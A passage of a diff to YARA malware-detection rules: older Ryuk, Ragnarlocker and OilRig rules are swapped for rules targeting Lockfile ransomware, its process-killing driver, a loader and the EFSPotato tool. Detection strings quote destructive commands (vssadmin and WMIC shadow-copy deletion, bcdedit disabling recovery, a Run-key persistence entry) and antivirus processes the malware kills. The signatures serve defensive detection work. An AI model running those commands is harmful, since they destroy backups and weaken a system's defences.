-		id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c"
-		date = "2020-12-27"
-		modified = "2021-01-01"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24"
+		id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd"
+		logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9"
 		score = 50
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00"
-		hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d"
+		hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a"
+		hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce"
 		level = "Experimental"
+		adversary = "Lockfile"
 
 	strings:
-		$seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 }
-		$seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 }
-		$seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 }
-		$s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide
-		$s2 = "_VERSION_INFO" fullword wide
-		$s3 = "VkKeyScanW" fullword ascii
-		$s4 = { 53 43 61 4d 69 72 }
+		$s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 }
+		$s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 }
+		$s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 }
+		$s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
 }
-
-rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Ragnarlocker by strings (July 2020)"
+		description = "Detect KillProc driver used by Night Dragon for kill process before encryption"
 		author = "Arkbird_SOLG"
-		id = "9291ed33-8d7d-5b88-9075-b847fdbab179"
-		date = "2020-07-30"
-		modified = "2020-07-30"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34"
+		id = "b0d6a21d-f451-58c9-b640-ad57feec7c38"
+		date = "2021-08-27"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954"
+		logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
-		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
+		hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9"
+		adversary = "Lockfile"
 
 	strings:
-		$f1 = "bootfont.bin" fullword wide
-		$f2 = "bootmgr.efi" fullword wide
-		$f3 = "bootsect.bak" fullword wide
-		$r1 = "$!.txt" fullword wide
-		$r2 = "---BEGIN KEY R_R---" fullword ascii
-		$r3 = "!$R4GN4R_" fullword wide
-		$r4 = "RAGNRPW" fullword ascii
-		$r5 = "---END KEY R_R---" fullword ascii
-		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
-		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
-		$a3 = "WinSta0\\Default" fullword wide
-		$a4 = "%s-%s-%s-%s-%s" fullword wide
-		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
-		$c1 = "-backup" fullword wide
-		$c2 = "-force" fullword wide
-		$c3 = "-vmback" fullword wide
-		$c4 = "-list" fullword wide
-		$s1 = ".ragn@r_" fullword wide
-		$s2 = "\\notepad.exe" fullword wide
-		$s3 = "Opera Software" fullword wide
-		$s4 = "Tor browser" fullword wide
+		$s1 = "find %s!\n" fullword ascii
+		$s2 = "killed %s!\n" fullword ascii
+		$s3 = "DbgPrint" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		$s5 = "SBPIMSvc.exe" fullword ascii
+		$s6 = "MsMpEng.exe" fullword ascii
+		$s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 }
+		$s8 = "UpdaterUI.exe" fullword ascii
+		$s9 = "VipreNis.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize > 3KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Obsidium cryptor by memory string"
+		description = "Detect kernel driver used by lockfile group"
 		author = "Arkbird_SOLG"
-		id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04"
-		date = "2020-10-25"
-		modified = "2020-10-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15"
+		id = "80bf5286-6da6-5380-ad14-345d8122d3d4"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7"
+		logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb"
 		score = 75
 		quality = 50
 		tags = "FILE"
+		hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f"
+		hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644"
+		hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597"
+		hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = "Obsidium\\" fullword ascii
-		$s2 = "obsidium.dll" fullword ascii
-		$s3 = "Software\\Obsidium" fullword ascii
-		$s4 = "winmm.dll" fullword ascii
-		$s5 = "'license.key" fullword ascii
+		$s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide
+		$s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide
+		$s3 = "\\DosDevices\\%wS" fullword wide
+		$s4 = "%temp%\\" fullword wide
+		$s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 }
+		$s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect RYUK ransomware (Sept_2020_V1)"
+		description = "Detect loader used by lockerfile group"
 		author = "Arkbird_SOLG"
-		id = "7ade43ef-cd31-5308-b5ab-71f04d27018b"
-		date = "2020-10-25"
-		modified = "2020-10-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29"
+		id = "031335f3-e6c7-5e94-af23-c7fb254203b7"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16"
 		license_url = "N/A"
-		logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e"
+		logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
-		hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
-		hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
+		hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291"
+		adversary = "Lockfile"
 
 	strings:
-		$c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii
-		$c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii
-		$c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii
-		$c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii
-		$c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii
-		$r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide
-		$r2 = "/C REG DELETE \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /f" fullword wide
-		$ref1 = "lsaas.exe" fullword wide
-		$ref2 = "Ncsrss.exe" fullword wide
-		$ref3 = "$WGetCurrentProcess" fullword ascii
-		$ref4 = "lan.exe" fullword wide
-		$ref5 = "explorer.exe" fullword wide
-		$ref6 = "Ws2_32.dll" fullword ascii
-		$p1 = "\\users\\Public\\sys" fullword wide
-		$p2 = "\\Documents and Settings\\Default User\\sys" fullword wide
+		$s1 = "c:\\windows\\system32\\calc.exe" fullword ascii
+		$s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc }
+		$s3 = "/proc/123/stat" fullword ascii
+		$s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $c* ) and 1 of ( $r* ) and 4 of ( $ref* ) and 1 of ( $p* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE
+rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect RYUK ransomware (Sept_2020_V1 + V2)"
+		description = "Detect custom .NET variant EFSPotatoe tool"
 		author = "Arkbird_SOLG"
-		id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6"
-		date = "2020-10-25"
-		modified = "2020-10-28"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29"
+		id = "614a6543-89ce-5f75-9933-766fd1e5458b"
+		date = "2021-08-27"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f"
+		logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-		hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe"
-		hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8"
-		hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
-		hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
-		hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
-		hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204"
+		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
+		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = "Type Descriptor'" fullword ascii
-		$s2 = "Class Hierarchy Descriptor'" fullword ascii
-		$s3 = "GET:PV" fullword ascii
-		$s4 = "Base Class Descriptor at (" fullword ascii
-		$s5 = "Complete Object Locator'" fullword ascii
-		$s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii
-		$s7 = "FrystFsgcteIaui" fullword ascii
-		$s8 = "delete[]" fullword ascii
-		$s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii
-		$s10 = "FrystGfuvrozHctj" fullword ascii
-		$s11 = "FrystUfngasfCqovf{v" fullword ascii
-		$op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 }
-		$op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d }
+		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
+		$s2 = "ncacn_np" fullword wide
+		$s3 = "WinSta0\\Default" fullword wide
+		$s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 }
+		$s5 = "EfsPotato <cmd>" wide
+		$s6 = "\\\\.\\pipe\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 6 of ( $s* ) and 1 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE
+rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect VBS script in base 64 used by OilRig (2016)"
+		description = "Detect Lockfile ransomware (unpacked version)"
 		author = "Arkbird_SOLG"
-		id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730"
-		date = "2020-08-26"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23"
+		id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad"
+		logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63"
+		score = 50
+		quality = 75
+		tags = "FILE"
+		hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c"
+		level = "experimental"
+		adversary = "Lockfile"
+
+	strings:
+		$s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff }
+		$s2 = "winsta0\\default" fullword ascii
+		$s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 }
+		$s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 }
+		$s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 }
+		$s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE
+{
+	meta:
+		description = "Detect EFSPotatoe tool (Generic rule)"
+		author = "Arkbird_SOLG"
+		id = "f40673da-7b16-5657-ba9a-f3f13034ad12"
+		date = "2021-08-27"
+		modified = "2021-08-29"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20"
+		license_url = "N/A"
+		logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3"
 		score = 75
-		quality = 63
+		quality = 75
 		tags = "FILE"
